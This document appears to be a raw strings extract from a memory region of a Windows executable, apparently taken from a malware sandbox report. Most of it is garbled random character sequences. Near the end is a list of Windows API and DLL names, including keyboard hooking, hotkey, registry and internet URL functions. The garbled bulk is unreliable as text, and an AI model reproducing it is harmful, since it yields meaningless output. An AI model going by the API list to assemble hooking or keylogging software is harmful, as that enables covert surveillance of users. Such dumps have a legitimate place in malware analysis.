^.af@glvrp
RYec.dj
@DM.KQq\[
! @6;9=8
%uvw~
', -758:
.) 2621`^@
z(.yx
[_bad.lj
DIM.WUh_x~
\Xbn.qsJt3
Q=A.DO
.[g`.dc1o
#"(41 5:89<;
=D.EB
.nx9;8
RVZed.giYr~-
. %8,-/.*
HJLK.RW@S\flm
9# y.YD
W.dJ;
%#'&-7?.9;
&#*.aX
FCJLU.PQ
i.(.IK
,`.Ka
!0 -) .(
TXgcli.ohPupz
]`ackop.wy
8.ZP.xe
~y%xE)
_ "-/751
;%u4DH
.jqt'
@.EOUS
EAF.LT
crp.uy
GJ.IN
TZc.di
(W.jR_'
ÂcE&
a.hl9qu
!9=AI.SZ]
& /.zO(
.DQ(A*
% .GJlP}
|]%x`
il.kv
-c.kd
|FK.cq
N1%f!
$-.)0;=:
/, 709=;
.RY{zc
\a.eiSv&$e
Q]f.gc
3O.kG
i".GA
* /7<98`
.HJhV
d.muhqy
(598;?8'
eo.rt
.emhoknr
lO%cJ
 /$312;@
%sKCP
%s/u?~)
em.qubzOf
.yM@bo
NLM.VY8akmlq
RPSYd.ei8s{}
$d$.OI@
'.RSo
!./53<>_
3=?D.BI
jF.Ic
R@.rl
'! )/.21
QX[d.lj(pr
:@FHVQSQL
DBEIS^c.bj3o?
;A.BK
ec.ljVnD
3.SO^
-*.OV
/6e%x
IR_.Yc
sv.wq
,-14>?=5
T\ef.jh
o$)70;.BJ
_.abPmrqpp_y
urlx{
|G.fa
.XK(v
as7%U=
<F></F>
VP^.YaXgn
`cjo.kh
<",)/*7|
6Yp%U
{B.AG
LQ^ab.nh
# ")7065
 -71500.
R .ghIor='
sk.tp8wy
o.IGMgF<
h.Nf O
.Bx$ 
! )0.*179
&,7?D.AB
DBusSql
SVZgckj.hvh
@.HPW
& #"(58:`
$#/:*,25
%Xi&_l
%fPNk
?=:GOQT.ZX
_%x!6
ýS?
SXcakr.wq
YX\.ag
$.OWd
!'#$/. )63?9;
.jF,1
$,.15<@)3
M.SR#_
\'%-.59;
[!.SN
RegOpenKeyExA
comdlg32.dll
iphlpapi.dll
SetViewportExtEx
GetViewportOrgEx
KERNEL32.dll
.ILWj}
SHELL32.dll
ScaleViewportExtEx
UnhookWindowsHookEx
GetCPInfo
GetKeyState
-N}MD
RegCreateKeyExA
.IHC6a
RegCloseKey
1, 0, 6, 6
(*.*)
%original file name%.exe_208_rwx_009BC000_00002000:
WININET.dll
RegDeleteKeyA
ADVAPI32.dll
InternetCrackUrlA
OLEAUT32.dll
SetWindowsHookExA
RegisterHotKey
GetViewportExtEx
RegOpenKeyA
6u!'$%f
RASAPI32.dll
%original file name%.exe_208_rwx_009BF000_00001000:
The procedure entry point %c could not be located in the dynamic link library %s
USER32.dll
The ordinal %u could not be located in the dynamic link library %s
GetProcessHeap
InternetCanonicalizeUrlA
OffsetViewportOrgEx